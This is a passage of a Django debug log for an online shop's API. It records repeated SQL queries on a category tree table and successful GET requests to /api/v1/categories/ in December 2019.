"shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:00:30,115 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:00:30,119 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:00:30,123 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:00:30,127 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:00:30,131 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:00:30,135 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:00:30,139 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:00:30,146 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:00:30] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:00:35,727 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:00:35,732 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:00:35,736 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:00:35,740 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:00:35,743 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:00:35,746 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:00:35,750 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:00:35,754 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:00:35,758 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:00:35,761 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:00:35,765 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:00:35] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:00:51,609 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:00:51,614 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:00:51,616 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:00:51,619 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:00:51,621 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:00:51,623 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:00:51,625 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:00:51,628 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:00:51,630 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:00:51,633 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:00:51,636 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:00:51] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:00:53,204 utils 11259 139831317362432 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:00:53,209 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:00:53,211 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:00:53,214 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:00:53,216 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:00:53,218 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:00:53,221 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:00:53,223 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:00:53,226 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:00:53,228 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:00:53,231 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:00:53] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:01:10,574 utils 11259 139831317362432 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:01:10,582 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:01:10,587 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:01:10,591 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:01:10,595 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:01:10,601 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:01:10,607 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:01:10,612 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:01:10,616 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:01:10,621 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:01:10,625 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:01:10] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:01:54,199 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:01:54,204 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:01:54,206 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:01:54,210 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-13 08:01:54,213 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-13 08:01:54,215 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-13 08:01:54,217 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-13 08:01:54,220 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-13 08:01:54,223 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-13 08:01:54,226 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-13 08:01:54,228 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) [13/Dec/2019 08:01:54] "GET /api/v1/categories/ HTTP/1.0" 200 1769 DEBUG 2019-12-13 08:02:11,955 utils 11259 139831317362432 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-13 08:02:11,960 utils 11259 139831317362432 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-13 08:02:11,962 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-13 08:02:11,964 utils 11259 139831317362432 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", 